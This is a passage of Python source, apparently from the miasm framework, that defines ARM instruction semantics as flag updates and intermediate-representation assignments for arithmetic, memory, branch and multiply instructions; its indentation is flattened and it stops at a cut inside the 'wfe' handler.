from miasm.arch.arm.arch import mn_arm, mn_armt
from miasm.arch.arm.regs import *
from miasm.jitter.csts import EXCEPT_DIV_BY_ZERO, EXCEPT_INT_XX
# liris.cnrs.fr/~mmrissa/lib/exe/fetch.php?media=armv7-a-r-manual.pdf
EXCEPT_SOFT_BP = (1 << 1)
EXCEPT_PRIV_INSN = (1 << 17)
# CPSR: N Z C V
def update_flag_zf(a):
return [ExprAssign(zf, ExprOp("FLAG_EQ", a))]
def update_flag_zf_eq(a, b):
return [ExprAssign(zf, ExprOp("FLAG_EQ_CMP", a, b))]
def update_flag_nf(arg):
return [
ExprAssign(
nf,
ExprOp("FLAG_SIGN_SUB", arg, ExprInt(0, arg.size))
)
]
def update_flag_zn(a):
e = []
e += update_flag_zf(a)
e += update_flag_nf(a)
return e
# XXX TODO: set cf if ROT imm in argument
def check_ops_msb(a, b, c):
if not a or not b or not c or a != b or a != c:
raise ValueError('bad ops size %s %s %s' % (a, b, c))
def update_flag_add_cf(op1, op2):
"Compute cf in @op1 + @op2"
return [ExprAssign(cf, ExprOp("FLAG_ADD_CF", op1, op2))]
def update_flag_add_of(op1, op2):
"Compute of in @op1 + @op2"
return [ExprAssign(of, ExprOp("FLAG_ADD_OF", op1, op2))]
def update_flag_sub_cf(op1, op2):
"Compote CF in @op1 - @op2"
return [ExprAssign(cf, ExprOp("FLAG_SUB_CF", op1, op2) ^ ExprInt(1, 1))]
def update_flag_sub_of(op1, op2):
"Compote OF in @op1 - @op2"
return [ExprAssign(of, ExprOp("FLAG_SUB_OF", op1, op2))]
def update_flag_arith_add_co(arg1, arg2):
e = []
e += update_flag_add_cf(arg1, arg2)
e += update_flag_add_of(arg1, arg2)
return e
def update_flag_arith_add_zn(arg1, arg2):
"""
Compute zf and nf flags for (arg1 + arg2)
"""
e = []
e += update_flag_zf_eq(arg1, -arg2)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUB", arg1, -arg2))]
return e
def update_flag_arith_sub_co(arg1, arg2):
"""
Compute cf and of flags for (arg1 - arg2)
"""
e = []
e += update_flag_sub_cf(arg1, arg2)
e += update_flag_sub_of(arg1, arg2)
return e
def update_flag_arith_sub_zn(arg1, arg2):
"""
Compute zf and nf flags for (arg1 - arg2)
"""
e = []
e += update_flag_zf_eq(arg1, arg2)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUB", arg1, arg2))]
return e
def update_flag_zfaddwc_eq(arg1, arg2, arg3):
return [ExprAssign(zf, ExprOp("FLAG_EQ_ADDWC", arg1, arg2, arg3))]
def update_flag_zfsubwc_eq(arg1, arg2, arg3):
return [ExprAssign(zf, ExprOp("FLAG_EQ_SUBWC", arg1, arg2, arg3))]
def update_flag_arith_addwc_zn(arg1, arg2, arg3):
"""
Compute znp flags for (arg1 + arg2 + cf)
"""
e = []
e += update_flag_zfaddwc_eq(arg1, arg2, arg3)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_ADDWC", arg1, arg2, arg3))]
return e
def update_flag_arith_subwc_zn(arg1, arg2, arg3):
"""
Compute znp flags for (arg1 - (arg2 + cf))
"""
e = []
e += update_flag_zfsubwc_eq(arg1, arg2, arg3)
e += [ExprAssign(nf, ExprOp("FLAG_SIGN_SUBWC", arg1, arg2, arg3))]
return e
def update_flag_addwc_cf(op1, op2, op3):
"Compute cf in @res = @op1 + @op2 + @op3"
return [ExprAssign(cf, ExprOp("FLAG_ADDWC_CF", op1, op2, op3))]
def update_flag_addwc_of(op1, op2, op3):
"Compute of in @res = @op1 + @op2 + @op3"
return [ExprAssign(of, ExprOp("FLAG_ADDWC_OF", op1, op2, op3))]
def update_flag_arith_addwc_co(arg1, arg2, arg3):
e = []
e += update_flag_addwc_cf(arg1, arg2, arg3)
e += update_flag_addwc_of(arg1, arg2, arg3)
return e
def update_flag_subwc_cf(op1, op2, op3):
"Compute cf in @res = @op1 + @op2 + @op3"
return [ExprAssign(cf, ExprOp("FLAG_SUBWC_CF", op1, op2, op3) ^ ExprInt(1, 1))]
def update_flag_subwc_of(op1, op2, op3):
"Compute of in @res = @op1 + @op2 + @op3"
return [ExprAssign(of, ExprOp("FLAG_SUBWC_OF", op1, op2, op3))]
def update_flag_arith_subwc_co(arg1, arg2, arg3):
e = []
e += update_flag_subwc_cf(arg1, arg2, arg3)
e += update_flag_subwc_of(arg1, arg2, arg3)
return e
def get_dst(a):
if a == PC:
return PC
return None
# instruction definition ##############
def adc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b + c + cf.zeroExtend(32)
if instr.name == 'ADCS' and a != PC:
e += update_flag_arith_addwc_zn(arg1, arg2, cf)
e += update_flag_arith_addwc_co(arg1, arg2, cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def add(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b + c
if instr.name == 'ADDS' and a != PC:
e += update_flag_arith_add_zn(arg1, arg2)
e += update_flag_arith_add_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def l_and(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b & c
if instr.name == 'ANDS' and a != PC:
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', b, c))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sub(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b - c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def subs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = b - c
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def eor(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b ^ c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def eors(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 ^ arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_CMP', arg1, arg2))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsb(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - arg2
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsbs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - arg2
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sbc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sbcs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e += update_flag_arith_subwc_zn(arg1, arg2, ~cf)
e += update_flag_arith_subwc_co(arg1, arg2, ~cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rsc(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rscs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = c, b
r = arg1 - (arg2 + (~cf).zeroExtend(32))
e += update_flag_arith_subwc_zn(arg1, arg2, ~cf)
e += update_flag_arith_subwc_co(arg1, arg2, ~cf)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def tst(ir, instr, a, b):
e = []
arg1, arg2 = a, b
r = arg1 & arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', arg1, arg2))]
e += update_flag_nf(r)
return e, []
def teq(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 ^ arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_CMP', arg1, arg2))]
e += update_flag_nf(r)
return e, []
def l_cmp(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
e += update_flag_arith_sub_zn(arg1, arg2)
e += update_flag_arith_sub_co(arg1, arg2)
return e, []
def cmn(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
e += update_flag_arith_add_zn(arg1, arg2)
e += update_flag_arith_add_co(arg1, arg2)
return e, []
def orr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b | c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def orn(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ~(b | c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def orrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
arg1, arg2 = b, c
r = arg1 | arg2
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mov(ir, instr, a, b):
e = [ExprAssign(a, b)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, b))
return e, []
def movt(ir, instr, a, b):
r = a | b << ExprInt(16, 32)
e = [ExprAssign(a, r)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def movs(ir, instr, a, b):
e = []
e.append(ExprAssign(a, b))
# XXX TODO check
e += [ExprAssign(zf, ExprOp('FLAG_EQ', b))]
e += update_flag_nf(b)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, b))
return e, []
def mvn(ir, instr, a, b):
r = b ^ ExprInt(-1, 32)
e = [ExprAssign(a, r)]
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mvns(ir, instr, a, b):
e = []
r = b ^ ExprInt(-1, 32)
e.append(ExprAssign(a, r))
# XXX TODO check
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mrs(ir, instr, a, b):
e = []
if b.is_id('CPSR_cxsf'):
out = []
out.append(ExprInt(0x10, 28))
out.append(of)
out.append(cf)
out.append(zf)
out.append(nf)
e.append(ExprAssign(a, ExprCompose(*out)))
else:
raise NotImplementedError("MRS not implemented")
return e, []
def msr(ir, instr, a, b):
e = []
if a.is_id('CPSR_cf'):
e.append(ExprAssign(nf, b[31:32]))
e.append(ExprAssign(zf, b[30:31]))
e.append(ExprAssign(cf, b[29:30]))
e.append(ExprAssign(of, b[28:29]))
else:
raise NotImplementedError("MSR not implemented")
return e, []
def neg(ir, instr, a, b):
e = []
r = - b
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def negs(ir, instr, a, b):
return subs(ir, instr, a, ExprInt(0, b.size), b)
def bic(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b & (c ^ ExprInt(-1, 32))
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def bics(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
tmp1, tmp2 = b, ~c
r = tmp1 & tmp2
e += [ExprAssign(zf, ExprOp('FLAG_EQ_AND', tmp1, tmp2))]
e += update_flag_nf(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sdiv(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
loc_div = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_except = ExprId(ir.loc_db.add_location(), ir.IRDst.size)
loc_next = ExprLoc(ir.get_next_loc_key(instr), ir.IRDst.size)
e.append(ExprAssign(ir.IRDst, ExprCond(c, loc_div, loc_except)))
do_except = []
do_except.append(ExprAssign(exception_flags, ExprInt(EXCEPT_DIV_BY_ZERO, exception_flags.size)))
do_except.append(ExprAssign(ir.IRDst, loc_next))
blk_except = IRBlock(loc_except.loc_key, [AssignBlock(do_except, instr)])
r = ExprOp("sdiv", b, c)
do_div = []
do_div.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
do_div.append(ExprAssign(ir.IRDst, r))
do_div.append(ExprAssign(ir.IRDst, loc_next))
blk_div = IRBlock(loc_div.loc_key, [AssignBlock(do_div, instr)])
return e, [blk_div, blk_except]
def udiv(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
loc_div = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_except = ExprLoc(ir.loc_db.add_location(), ir.IRDst.size)
loc_next = ExprLoc(ir.get_next_loc_key(instr), ir.IRDst.size)
e.append(ExprAssign(ir.IRDst, ExprCond(c, loc_div, loc_except)))
do_except = []
do_except.append(ExprAssign(exception_flags, ExprInt(EXCEPT_DIV_BY_ZERO, exception_flags.size)))
do_except.append(ExprAssign(ir.IRDst, loc_next))
blk_except = IRBlock(loc_except.loc_key, [AssignBlock(do_except, instr)])
r = ExprOp("udiv", b, c)
do_div = []
do_div.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
do_div.append(ExprAssign(ir.IRDst, r))
do_div.append(ExprAssign(ir.IRDst, loc_next))
blk_div = IRBlock(loc_div.loc_key, [AssignBlock(do_div, instr)])
return e, [blk_div, blk_except]
def mla(ir, instr, a, b, c, d):
e = []
r = (b * c) + d
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mlas(ir, instr, a, b, c, d):
e = []
r = (b * c) + d
e += update_flag_zn(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mls(ir, instr, a, b, c, d):
e = []
r = d - (b * c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def mul(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b * c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def muls(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b * c
e += update_flag_zn(r)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def umull(ir, instr, a, b, c, d):
e = []
r = c.zeroExtend(64) * d.zeroExtend(64)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def umlal(ir, instr, a, b, c, d):
e = []
r = c.zeroExtend(64) * d.zeroExtend(64) + ExprCompose(a, b)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def smull(ir, instr, a, b, c, d):
e = []
r = c.signExtend(64) * d.signExtend(64)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def smlal(ir, instr, a, b, c, d):
e = []
r = c.signExtend(64) * d.signExtend(64) + ExprCompose(a, b)
e.append(ExprAssign(a, r[0:32]))
e.append(ExprAssign(b, r[32:64]))
# r15/IRDst not allowed as output
return e, []
def b(ir, instr, a):
e = []
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
return e, []
def bl(ir, instr, a):
e = []
l = ExprInt(instr.offset + instr.l, 32)
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
e.append(ExprAssign(LR, l))
return e, []
def bx(ir, instr, a):
e = []
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
return e, []
def blx(ir, instr, a):
e = []
l = ExprInt(instr.offset + instr.l, 32)
e.append(ExprAssign(PC, a))
e.append(ExprAssign(ir.IRDst, a))
e.append(ExprAssign(LR, l))
return e, []
def st_ld_r(ir, instr, a, a2, b, store=False, size=32, s_ext=False, z_ext=False):
e = []
wb = False
postinc = False
b = b.ptr
if isinstance(b, ExprOp):
if b.op == "wback":
wb = True
b = b.args[0]
if b.op == "postinc":
postinc = True
if isinstance(b, ExprOp) and b.op in ["postinc", 'preinc']:
# XXX TODO CHECK
base, off = b.args[0], b.args[1] # ExprInt(size/8, 32)
else:
base, off = b, ExprInt(0, 32)
if postinc:
ad = base
else:
ad = base + off
# PC base lookup uses PC 4 byte alignment
ad = ad.replace_expr({PC: PC & ExprInt(0xFFFFFFFC, 32)})
dmem = False
if size in [8, 16]:
if store:
a = a[:size]
m = ExprMem(ad, size=size)
elif s_ext:
m = ExprMem(ad, size=size).signExtend(a.size)
elif z_ext:
m = ExprMem(ad, size=size).zeroExtend(a.size)
else:
raise ValueError('unhandled case')
elif size == 32:
m = ExprMem(ad, size=size)
elif size == 64:
assert a2 is not None
m = ExprMem(ad, size=32)
dmem = True
size = 32
else:
raise ValueError('the size DOES matter')
dst = None
if store:
e.append(ExprAssign(m, a))
if dmem:
e.append(ExprAssign(ExprMem(ad + ExprInt(4, 32), size=size), a2))
else:
if a == PC:
dst = PC
e.append(ExprAssign(ir.IRDst, m))
e.append(ExprAssign(a, m))
if dmem:
e.append(ExprAssign(a2, ExprMem(ad + ExprInt(4, 32), size=size)))
# XXX TODO check multiple write cause by wb
if wb or postinc:
e.append(ExprAssign(base, base + off))
return e, []
def ldr(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False)
def ldrd(ir, instr, a, b, c=None):
if c is None:
a2 = ir.arch.regs.all_regs_ids[ir.arch.regs.all_regs_ids.index(a) + 1]
else:
a2 = b
b = c
return st_ld_r(ir, instr, a, a2, b, store=False, size=64)
def l_str(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True)
def l_strd(ir, instr, a, b, c=None):
if c is None:
a2 = ir.arch.regs.all_regs_ids[ir.arch.regs.all_regs_ids.index(a) + 1]
else:
a2 = b
b = c
return st_ld_r(ir, instr, a, a2, b, store=True, size=64)
def ldrb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=8, z_ext=True)
def ldrsb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=8, s_ext=True, z_ext=False)
def strb(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True, size=8)
def ldrh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=16, z_ext=True)
def strh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=True, size=16, z_ext=True)
def ldrsh(ir, instr, a, b):
return st_ld_r(ir, instr, a, None, b, store=False, size=16, s_ext=True, z_ext=False)
def st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=False):
e = []
wb = False
dst = None
if isinstance(a, ExprOp) and a.op == 'wback':
wb = True
a = a.args[0]
if isinstance(b, ExprOp) and b.op == 'sbit':
b = b.args[0]
regs = b.args
base = a
if updown:
step = 4
else:
step = -4
regs = regs[::-1]
if postinc:
pass
else:
base += ExprInt(step, 32)
for i, r in enumerate(regs):
ad = base + ExprInt(i * step, 32)
if store:
e.append(ExprAssign(ExprMem(ad, 32), r))
else:
e.append(ExprAssign(r, ExprMem(ad, 32)))
if r == PC:
e.append(ExprAssign(ir.IRDst, ExprMem(ad, 32)))
# XXX TODO check multiple write cause by wb
if wb:
if postinc:
e.append(ExprAssign(a, base + ExprInt(len(regs) * step, 32)))
else:
e.append(ExprAssign(a, base + ExprInt((len(regs) - 1) * step, 32)))
if store:
pass
else:
assert(isinstance(b, ExprOp) and b.op == "reglist")
return e, []
def ldmia(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=True, updown=True)
def ldmib(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=True)
def ldmda(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=True, updown=False)
def ldmdb(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=False, postinc=False, updown=False)
def stmia(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=True, updown=True)
def stmib(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=False, updown=True)
def stmda(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=True, updown=False)
def stmdb(ir, instr, a, b):
return st_ld_m(ir, instr, a, b, store=True, postinc=False, updown=False)
def svc(ir, instr, a):
e = []
except_int = EXCEPT_INT_XX
e.append(ExprAssign(exception_flags, ExprInt(except_int, 32)))
e.append(ExprAssign(interrupt_num, a))
return e, []
def und(ir, instr, a, b):
# XXX TODO implement
e = []
return e, []
# TODO XXX implement correct CF for shifters
def lsr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b >> c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b >> c
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def asr(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ExprOp("a>>", b, c)
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def asrs(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = ExprOp("a>>", b, c)
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsl(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b << c
e.append(ExprAssign(a, r))
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def lsls(ir, instr, a, b, c=None):
e = []
if c is None:
b, c = a, b
r = b << c
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def rors(ir, instr, a, b):
e = []
r = ExprOp(">>>", a, b)
e.append(ExprAssign(a, r))
e += [ExprAssign(zf, ExprOp('FLAG_EQ', r))]
e += update_flag_nf(r)
dst = get_dst(a)
if dst is not None:
e.append(ExprAssign(ir.IRDst, r))
return e, []
def push(ir, instr, a):
e = []
regs = list(a.args)
for i in range(len(regs)):
r = SP + ExprInt(-4 * len(regs) + 4 * i, 32)
e.append(ExprAssign(ExprMem(r, 32), regs[i]))
r = SP + ExprInt(-4 * len(regs), 32)
e.append(ExprAssign(SP, r))
return e, []
def pop(ir, instr, a):
e = []
regs = list(a.args)
dst = None
for i in range(len(regs)):
r = SP + ExprInt(4 * i, 32)
e.append(ExprAssign(regs[i], ExprMem(r, 32)))
if regs[i] == ir.pc:
dst = ExprMem(r, 32)
r = SP + ExprInt(4 * len(regs), 32)
e.append(ExprAssign(SP, r))
if dst is not None:
e.append(ExprAssign(ir.IRDst, dst))
return e, []
def cbz(ir, instr, a, b):
e = []
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
e.append(ExprAssign(ir.IRDst, ExprCond(a, loc_next_expr, b)))
return e, []
def cbnz(ir, instr, a, b):
e = []
loc_next = ir.get_next_loc_key(instr)
loc_next_expr = ExprLoc(loc_next, 32)
e.append(ExprAssign(ir.IRDst, ExprCond(a, b, loc_next_expr)))
return e, []
def uxtb(ir, instr, a, b):
e = []
r = b[:8].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def uxth(ir, instr, a, b):
e = []
r = b[:16].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sxtb(ir, instr, a, b):
e = []
r = b[:8].signExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def sxth(ir, instr, a, b):
e = []
r = b[:16].signExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def ubfx(ir, instr, a, b, c, d):
e = []
c = int(c)
d = int(d)
r = b[c:c+d].zeroExtend(32)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def bfc(ir, instr, a, b, c):
e = []
start = int(b)
stop = start + int(c)
out = []
last = 0
if start:
out.append(a[:start])
last = start
if stop - start:
out.append(ExprInt(0, 32)[last:stop])
last = stop
if last < 32:
out.append(a[last:])
r = ExprCompose(*out)
e.append(ExprAssign(a, r))
dst = None
if PC in a.get_r():
dst = PC
e.append(ExprAssign(ir.IRDst, r))
return e, []
def pld(ir, instr, a):
e = []
return e, []
def pldw(ir, instr, a):
e = []
return e, []
def clz(ir, instr, a, b):
e = []
e.append(ExprAssign(a, ExprOp('cntleadzeros', b)))
return e, []
def uxtab(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, b + (c & ExprInt(0xff, 32))))
return e, []
def uxtah(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, b + (c & ExprInt(0xffff, 32))))
return e, []
def bkpt(ir, instr, a):
e = []
e.append(ExprAssign(exception_flags, ExprInt(EXCEPT_SOFT_BP, 32)))
e.append(ExprAssign(bp_num, a))
return e, []
def _extract_s16(arg, part):
if part == 'B': # bottom 16 bits
return arg[0:16]
elif part == 'T': # top 16 bits
return arg[16:32]
def smul(ir, instr, a, b, c):
e = []
e.append(ExprAssign(a, _extract_s16(b, instr.name[4]).signExtend(32) * _extract_s16(c, instr.name[5]).signExtend(32)))
return e, []
def smulw(ir, instr, a, b, c):
e = []
prod = b.signExtend(48) * _extract_s16(c, instr.name[5]).signExtend(48)
e.append(ExprAssign(a, prod[16:48]))
return e, [] # signed most significant 32 bits of the 48-bit result
def tbb(ir, instr, a):
e = []
dst = PC + ExprInt(2, 32) * a.zeroExtend(32)
e.append(ExprAssign(PC, dst))
e.append(ExprAssign(ir.IRDst, dst))
return e, []
def tbh(ir, instr, a):
e = []
dst = PC + ExprInt(2, 32) * a.zeroExtend(32)
e.append(ExprAssign(PC, dst))
e.append(ExprAssign(ir.IRDst, dst))
return e, []
def smlabb(ir, instr, a, b, c, d):
e = []
result = (b[:16].signExtend(32) * c[:16].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlabt(ir, instr, a, b, c, d):
e = []
result = (b[:16].signExtend(32) * c[16:32].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlatb(ir, instr, a, b, c, d):
e = []
result = (b[16:32].signExtend(32) * c[:16].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def smlatt(ir, instr, a, b, c, d):
e = []
result = (b[16:32].signExtend(32) * c[16:32].signExtend(32)) + d
e.append(ExprAssign(a, result))
return e, []
def uadd8(ir, instr, a, b, c):
e = []
sums = []
ges = []
for i in range(0, 32, 8):
sums.append(b[i:i+8] + c[i:i+8])
ges.append((b[i:i+8].zeroExtend(9) + c[i:i+8].zeroExtend(9))[8:9])
e.append(ExprAssign(a, ExprCompose(*sums)))
for i, value in enumerate(ges):
e.append(ExprAssign(ge_regs[i], value))
return e, []
def sel(ir, instr, a, b, c):
e = []
cond = nf ^ of ^ ExprInt(1, 1)
parts = []
for i in range(4):
parts.append(ExprCond(ge_regs[i], b[i*8:(i+1)*8], c[i*8:(i+1)*8]))
result = ExprCompose(*parts)
e.append(ExprAssign(a, result))
return e, []
def rev(ir, instr, a, b):
e = []
result = ExprCompose(b[24:32], b[16:24], b[8:16], b[:8])
e.append(ExprAssign(a, result))
return e, []
def rev16(ir, instr, a, b):
e = []
result = ExprCompose(b[8:16], b[:8], b[24:32], b[16:24])
e.append(ExprAssign(a, result))
return e, []
def nop(ir, instr):
e = []
return e, []
def dsb(ir, instr, a):
# XXX TODO
e = []
return e, []
def cpsie(ir, instr, a):
# XXX TODO
e = []
return e, []
def cpsid(ir, instr, a):
# XXX TODO
e = []
return e, []
def wfe(ir, instr):
